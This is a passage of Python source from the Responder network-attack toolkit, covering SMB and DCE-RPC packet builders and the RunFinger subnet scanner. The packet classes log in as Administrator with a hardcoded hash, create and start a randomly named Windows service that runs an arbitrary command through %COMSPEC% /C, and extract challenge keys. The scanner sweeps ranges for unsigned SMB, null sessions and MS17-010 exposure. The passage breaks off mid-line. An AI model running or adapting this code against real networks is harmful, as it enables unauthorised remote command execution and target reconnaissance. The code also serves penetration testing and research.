("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("Separator1","\x02" ),
("Dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("Separator2","\x02"),
("Dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("Separator3","\x02"),
("Dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("Separator4","\x02"),
("Dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("Separator5","\x02"),
("Dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("Separator6","\x02"),
("Dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
])
class SMBSessionTreeData(Packet):
fields = OrderedDict([
("Wordcount", "\x0d"),
("AndXCommand", "\x75"),
("Reserved", "\x00" ),
("Andxoffset", "\x7c\x00"),
("Maxbuff","\x04\x11"),
("Maxmpx", "\x32\x00"),
("Vcnum","\x00\x00"),
("Sessionkey", "\x00\x00\x00\x00"),
("AnsiPassLength","\x18\x00"),
("UnicodePassLength", "\x00\x00"),
("Reserved2","\x00\x00\x00\x00"),
("Capabilities", "\xd4\x00\x00\x00"),
("Bcc","\x3f\x00"),
("AnsiPasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
("UnicodePasswd", "\xe3\xa7\x10\x56\x58\xed\x92\xa1\xea\x9d\x55\xb1\x63\x99\x7f\xbe\x1c\xbd\x6c\x0a\xf8\xef\xb2\x89"),
("Username","Administrator"),
("UsernameTerminator","\x00\x00"),
("Domain","SMB"),
("DomainTerminator","\x00\x00"),
("Nativeos",""),
("NativeosTerminator","\x00\x00"),
("Lanmanager",""),
("LanmanagerTerminator","\x00\x00\x00"),
("Wordcount2","\x04"),
("Andxcmd2","\xff"),
("Reserved3","\x00"),
("Andxoffset2","\x06\x01"),
("Flags","\x08\x00"),
("PasswordLength","\x01\x00"),
("Bcc2","\x19\x00"),
("Passwd","\x00"),
("PrePath","\\\\"),
("Targ", "CSCDSFCS"),
("IPC", "\\IPC$"),
("TerminatorPath","\x00\x00"),
("Service","?????"),
("TerminatorService","\x00"),
])
def calculate(self):
##Convert first
self.fields["Username"] = self.fields["Username"].encode('utf-16be')
self.fields["Domain"] = self.fields["Domain"].encode('utf-16be')
self.fields["Nativeos"] = self.fields["Nativeos"].encode('utf-16be')
self.fields["Lanmanager"] = self.fields["Lanmanager"].encode('utf-16be')
self.fields["PrePath"] = self.fields["PrePath"].encode('utf-16le')
self.fields["Targ"] = self.fields["Targ"].encode('utf-16le')
self.fields["IPC"] = self.fields["IPC"].encode('utf-16le')
##Then calculate
data1= str(self.fields["AnsiPasswd"])+(self.fields["UnicodePasswd"])+str(self.fields["Username"])+str(self.fields["UsernameTerminator"])+str(self.fields["Domain"])+str(self.fields["DomainTerminator"])+str(self.fields["Nativeos"])+str(self.fields["NativeosTerminator"])+str(self.fields["Lanmanager"])+str(self.fields["LanmanagerTerminator"])
data2= str(self.fields["Passwd"])+str(self.fields["PrePath"])+str(self.fields["Targ"])+str(self.fields["IPC"])+str(self.fields["TerminatorPath"])+str(self.fields["Service"])+str(self.fields["TerminatorService"])
self.fields["Bcc"] = struct.pack("<h",len(data1))
self.fields["Bcc2"] = struct.pack("<h",len(data2))
self.fields["Andxoffset"] = struct.pack("<h",len(data1)+32+29)
self.fields["AnsiPassLength"] = struct.pack("<h",len(str(self.fields["AnsiPasswd"])))
self.fields["UnicodePassLength"] = struct.pack("<h",len(str(self.fields["UnicodePasswd"])))
self.fields["PasswordLength"] = struct.pack("<h",len(str(self.fields["Passwd"])))
class SMBNTCreateData(Packet):
fields = OrderedDict([
("Wordcount", "\x18"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("Reserved2", "\x00"),
("FileNameLen", "\x07\x00"),
("CreateFlags", "\x16\x00\x00\x00"),
("RootFID", "\x00\x00\x00\x00"),
("AccessMask", "\x00\x00\x00\x02"),
("AllocSize", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("FileAttrib", "\x00\x00\x00\x00"),
("ShareAccess", "\x07\x00\x00\x00"),
("Disposition", "\x01\x00\x00\x00"),
("CreateOptions", "\x00\x00\x00\x00"),
("Impersonation", "\x02\x00\x00\x00"),
("SecurityFlags", "\x00"),
("Bcc", "\x08\x00"),
("FileName", "\\svcctl"),
("FileNameNull", "\x00"),
])
def calculate(self):
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBReadData(Packet):
fields = OrderedDict([
("Wordcount", "\x0a"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("FID", "\x00\x00"),
("Offset", "\x19\x03\x00\x00"),
("MaxCountLow", "\xed\x01"),
("MinCount", "\xed\x01"),
("Hidden", "\xff\xff\xff\xff"),
("Remaining", "\x00\x00"),
("Bcc", "\x00\x00"),
("Data", ""),
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBWriteData(Packet):
fields = OrderedDict([
("Wordcount", "\x0e"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("FID", "\x06\x40"),
("Offset", "\xea\x03\x00\x00"),
("Reserved2", "\xff\xff\xff\xff"),
("WriteMode", "\x08\x00"),
("Remaining", "\xdc\x02"),
("DataLenHi", "\x00\x00"),
("DataLenLow", "\xdc\x02"),
("DataOffset", "\x3f\x00"),
("HiOffset", "\x00\x00\x00\x00"),
("Bcc", "\xdc\x02"),
("Data", ""),
])
def calculate(self):
self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBDCEData(Packet):
fields = OrderedDict([
("Version", "\x05"),
("VersionLow", "\x00"),
("PacketType", "\x0b"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"),
("MaxTransFrag", "\xd0\x16"),
("MaxRecvFrag", "\xd0\x16"),
("GroupAssoc", "\x00\x00\x00\x00"),
("CTXNumber", "\x01"),
("CTXPadding", "\x00\x00\x00"),
("CTX0ContextID", "\x00\x00"),
("CTX0ItemNumber", "\x01\x00"),
("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
("CTX0UIDVersion", "\x02\x00"),
("CTX0UIDVersionlo","\x00\x00"),
("CTX0UIDSyntax", "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
])
def calculate(self):
Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
self.fields["FragLen"] = struct.pack("<h",len(Data1))
class SMBDCEPacketData(Packet):
fields = OrderedDict([
("Version", "\x05"),
("VersionLow", "\x00"),
("PacketType", "\x00"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"),
("AllocHint", "\x38\x00\x00\x00"),
("ContextID", "\x00\x00"),
("Opnum", "\x0f\x00"),
("Data", ""),
])
def calculate(self):
Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
self.fields["FragLen"] = struct.pack("<h",len(Data1))
self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
class SMBDCESVCCTLOpenManagerW(Packet):
fields = OrderedDict([
("MachineNameRefID", "\xb5\x97\xb9\xbc"),
("MaxCount", "\x0f\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0f\x00\x00\x00"),
("MachineName", "\\\\169.220.1.11"),##This is not taken into consideration.
("MachineNameNull", "\x00\x00\x00\x00"),
("DbPointer", "\x00\x00\x00\x00"),
("AccessMask", "\x3f\x00\x0f\x00"),
])
def calculate(self):
## Convert to UTF-16LE
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
class SMBDCESVCCTLCreateService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", "AyAGaxwLhCP"),
("MachineNameNull", "\x00\x00"),
("ReferentID", "\x9c\xfa\x9a\xc9"),
("MaxCountRefID", "\x11\x00\x00\x00"),
("OffsetID", "\x00\x00\x00\x00"),
("ActualCountRefID", "\x11\x00\x00\x00"),
("DisplayNameID", "DhhUFcsvrfJvLwRq"),
("DisplayNameIDNull", "\x00\x00\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
("ServerType", "\x10\x01\x00\x00"),
("ServiceStartType", "\x03\x00\x00\x00"),
("ServiceErrorCtl", "\x00\x00\x00\x00"),
("BinPathMaxCount", "\xb6\x00\x00\x00"),
("BinPathOffset", "\x00\x00\x00\x00"),
("BinPathActualCount", "\xb6\x00\x00\x00"),
("BinPathName", "%COMSPEC% /C \""),
("BinCMD", ""),
("BintoEnd", "\""),
("BinPathNameNull", "\x00\x00"),
("Nullz", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
])
def calculate(self):
BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
## Calculate first
self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
## Then convert to UTF-16LE, yeah it's weird..
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
class SMBDCESVCCTLOpenService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", ""),
("MachineNameNull", "\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
])
def calculate(self):
## Calculate first
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
## Then convert to UTF-16LE, yeah it's weird..
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
class SMBDCESVCCTLStartService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
])
def ParseAnswerKey(data,host):
key = data[73:81]
print "Key retrieved is:%s from host:%s"%(key.encode("hex"),host)
return key

285
tools/RunFinger.py Executable file
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#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,socket,struct
import datetime
import multiprocessing
from socket import *
from odict import OrderedDict
import optparse
from RunFingerPackets import *
__version__ = "0.7"
parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
parser.add_option('-i','--ip', action="store", help="Target IP address or class C", dest="TARGET", metavar="10.10.10.224", default=None)
parser.add_option('-g','--grep', action="store_true", dest="Grep", default=False, help="Output in grepable format")
options, args = parser.parse_args()
if options.TARGET is None:
print "\n-i Mandatory option is missing, please provide a target or target range.\n"
parser.print_help()
exit(-1)
Timeout = 2
Host = options.TARGET
Grep = options.Grep
class Packet():
fields = OrderedDict([
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
return length
def GetBootTime(data):
Filetime = int(struct.unpack('<q',data)[0])
t = divmod(Filetime - 116444736000000000, 10000000)
time = datetime.datetime.fromtimestamp(t[0])
return time, time.strftime('%Y-%m-%d %H:%M:%S')
#####################
def IsSigningEnabled(data):
if data[39] == "\x0f":
return True
else:
return False
def atod(a):
return struct.unpack("!L",inet_aton(a))[0]
def dtoa(d):
return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
if length > 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length <= 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
Time = GetBootTime(data[60:68])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '':
DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined, Time
except:
return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
pass
try:
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
n = SMBNegoDataLanMan()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
s.close()
if data[8:10] == "\x72\x00":
return GetHostnameAndDomainName(data)
except:
pass
def SmbFinger(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
signing = IsSigningEnabled(data)
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
t = SMBSessionFingerData()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
OsVersion, ClientVersion = OsNameClientVersion(data)
return signing, OsVersion, ClientVersion
except:
pass
def SmbNullSession(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
try:
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x53\xc8")
t = SMBSessionData()
t.calculate()
final = t
packet1 = str(head)+str(final)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x17\xc8",uid=data[32:34],mid="\x80\x00")
t = SMBSession2()
t.calculate()
final = t
packet1 = str(head)+str(final)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x73\x00":
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",uid=data[32:34],mid="\xc0\x00")
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x75\x00":
global Guest
Guest = True
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",uid=data[32:34],tid=data[28:30],mid="\xc0\x00")
t = SMBTransRAPData()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
if data[9:13] == "\x05\x02\x00\xc0":
return Guest, True
else:
return Guest, False
else:
return False, False
except Exception:
pass
except:
pass
##################
#run it
def ShowResults(Host):
try:
Hostname, DomainJoined, Time = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
NullSess, Ms17010 = SmbNullSession(Host)
print "Retrieving information for %s..."%Host[0]
print "SMB signing:", Signing
print "Null Sessions Allowed:", NullSess
print "Vulnerable to MS10-010:", Ms17010
print "Server Time:", Time[1]
print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
except:
pass
def ShowSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
return False
try:
Hostname, DomainJoined, Time = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
NullSess, Ms17010 = SmbNullSession(Host)
Message = "['%s', Os:'%s', Domain:'%s', Signing:'%s', Time:'%s', Null Session: %s, MS17-010: %s]"%(Host[0], OsVer, DomainJoined, Signing, Time[1],NullSess, Ms17010)
print Message
except:
raise
pass
def IsGrepable():
if options.Grep:
return True
else:
return False
def RunFinger(Host):
m = re.search("/", str(Host))
if m :
net,_,mask = Host.partition('/')
mask = int(mask)
net = atod(net)
threads = []
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
if IsGrepable():
p = multiprocessing.Process(target=ShowSmallResults, args=((host,445),))
threads.append(p)
p.start()
else:
p = multiprocessing.Process(target=ShowResults, args=((host,445),))
threads.append(p)
p.start()
else:
if IsGrepable():
ShowSmallResults((Host,445))
else:
ShowResults((Host,445))
RunFinger(Host)

410
tools/RunFingerPackets.py Normal file
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import random, struct
from socket import *
from time import sleep
from odict import OrderedDict
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
return length
class Packet():
fields = OrderedDict([
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMBSessionFingerData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\x00\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xb1\x00"), #hardcoded len here and hardcoded packet below, no calculation, faster.
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
##Now Lanman
class SMBHeaderLanMan(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x08"),
("flag2", "\x01\xc8"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x3c\x1b"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
#We grab the domain and hostname from the negotiate protocol answer, since it is in a Lanman dialect format.
class SMBNegoDataLanMan(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x0c\x00"),#hardcoded len here and hardcoded packet below, no calculation, faster.
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMBSessionData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\xec\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xb1\x00"),
("ApplicationHeaderTag","\x60"),
("ApplicationHeaderLen","\x48"),
("AsnSecMechType","\x06"),
("AsnSecMechLen","\x06"),
("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
("ChoosedTag","\xa0"),
("ChoosedTagStrLen","\x3e"),
("NegTokenInitSeqHeadTag","\x30"),
("NegTokenInitSeqHeadLen","\x3c"),
("NegTokenInitSeqHeadTag1","\xA0"),
("NegTokenInitSeqHeadLen1","\x0e"),
("NegTokenInitSeqNLMPTag","\x30"),
("NegTokenInitSeqNLMPLen","\x0c"),
("NegTokenInitSeqNLMPTag1","\x06"),
("NegTokenInitSeqNLMPTag1Len","\x0a"),
("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenInitSeqNLMPTag2","\xa2"),
("NegTokenInitSeqNLMPTag2Len","\x2a"),
("NegTokenInitSeqNLMPTag2Octet","\x04"),
("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
("NegTokenInitSeqMechSignature","\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NegTokenInitSeqMechMessageType","\x01\x00\x00\x00"),
("NegTokenInitSeqMechMessageFlags","\x07\x82\x08\xa2"),
("NegTokenInitSeqMechMessageDomainNameLen","\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameMaxLen","\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameBuffOffset","\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameLen","\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameMaxLen","\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameBuffOffset","\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
("NegTokenInitSeqMechMessageVersionLow","\x01"),
("NegTokenInitSeqMechMessageVersionBuilt","\x28\x0a"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
("nativeOs","Windows 2002 Service Pack 3 2600".encode('utf-16le')),
("nativeOsterminator","\x00\x00"),
("nativelan","Windows 2002 5.1".encode('utf-16le')),
("nativelanterminator","\x00\x00\x00\x00"),
])
def calculate(self):
data1 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
